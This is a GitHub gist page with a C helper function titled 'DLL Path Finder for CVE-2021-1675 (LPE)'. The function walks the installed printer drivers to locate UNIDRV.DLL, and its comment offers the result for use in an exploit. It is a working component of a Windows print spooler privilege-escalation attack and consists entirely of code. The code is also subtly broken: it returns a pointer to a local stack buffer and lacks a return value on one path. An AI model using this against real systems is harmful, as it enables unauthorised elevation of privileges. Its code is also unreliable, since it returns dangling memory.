Skip to content

Instantly share code, notes, and snippets.

@hlldz
Last active January 26, 2022 12:39
Show Gist options
  • Save hlldz/6248cac6a719d0e2094be70a4261e18a to your computer and use it in GitHub Desktop.
Save hlldz/6248cac6a719d0e2094be70a4261e18a to your computer and use it in GitHub Desktop.
DLL Path Finder for CVE-2021-1675 (LPE)
// It is returns DLL path, you can use that value in exploit.
// Example return value: C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_xxxxxxxxxxxxxxxx\Amd64\UNIDRV.DLL
wchar_t* findDLLPath() {
wchar_t targetDLLPath[MAX_PATH] = { 0 };
DWORD dwNeeded;
LPBYTE lpDriverInfo;
DWORD dwReturned;
DRIVER_INFO_2* pInfo;
DWORD i;
EnumPrinterDriversW(NULL, NULL, 2, NULL, 0, &dwNeeded, &dwReturned);
lpDriverInfo = (LPBYTE)LocalAlloc(LPTR, dwNeeded);
if (lpDriverInfo == NULL) {
return 0;
}
EnumPrinterDrivers(NULL, NULL, 2, lpDriverInfo, dwNeeded, &dwNeeded, &dwReturned);
pInfo = (DRIVER_INFO_2*)lpDriverInfo;
for (i = 0; i < dwReturned; i++) {
if (wcsstr(pInfo->pDriverPath, L"ntprint.inf_amd64")) {
wchar_t tempDrive1[_MAX_DRIVE] = { 0 };
wchar_t tempDirectory1[_MAX_DIR] = { 0 };
wchar_t tempFileName1[_MAX_FNAME] = { 0 };
wchar_t tempFileExtension1[_MAX_EXT] = { 0 };
_wsplitpath_s(pInfo->pDriverPath, &tempDrive1[0], _MAX_DRIVE, &tempDirectory1[0], _MAX_DIR, &tempFileName1[0], _MAX_FNAME, &tempFileExtension1[0], _MAX_EXT);
wchar_t* targetDLLName = (LPWSTR)L"UNIDRV.DLL";
wcscat_s(targetDLLPath, MAX_PATH, tempDrive1);
wcscat_s(targetDLLPath, MAX_PATH, tempDirectory1);
wcscat_s(targetDLLPath, MAX_PATH, targetDLLName);
if (fileExists(targetDLLPath)) {
LocalFree(lpDriverInfo);
return targetDLLPath;
}
}
pInfo++;
}
LocalFree(lpDriverInfo);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment